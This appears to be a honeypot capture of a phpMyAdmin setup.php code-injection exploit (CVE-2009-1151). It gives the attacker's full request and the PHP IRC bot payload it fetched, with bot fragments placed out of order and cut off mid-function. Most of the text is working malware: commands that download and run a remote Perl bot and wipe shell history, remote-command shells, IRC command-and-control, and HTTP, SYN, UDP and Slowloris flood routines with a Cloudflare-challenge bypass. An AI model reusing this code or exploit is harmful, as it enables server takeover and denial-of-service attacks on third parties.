$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atacul a fost initiat!");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atac terminat cu succes: 12" . $env . " MB trimisi / Medie: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2#TKH -> !\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
51.75.68.146
Dest. port: 80
Time: 17/02/2019 08:32:21
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Roubaix (zipcode 59100)
rDNS: 146.ip-51-75-68.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE
CVE-2009-1151
Author
Adrian "pagvac" Pastor
Plugin ID
oosheefee1baixeinief5nociu5shohh
POST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 231
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2F%2F51%2E75%2E68%2E146%2Fpub%2Fx%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: d9030cacb19a6bff1f4c5f78d1288ac7
Type: text/x-php
Size: 44240
URL: ftp://51.75.68.146/pub/x
# SUCK MY DICK HONERIX!!! :)))
# _|_!!
<?php
$cfg = array(
"server" => "91.134.146.175",
"port" => "1984",
"key" => "",
"prefix" => "|",
"maxrand" => "9",
"chan" => "#test",
"trigger" => "",
"hostauth" => "sidehost"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
$url="http://92.222.68.32/";
exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Finished!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
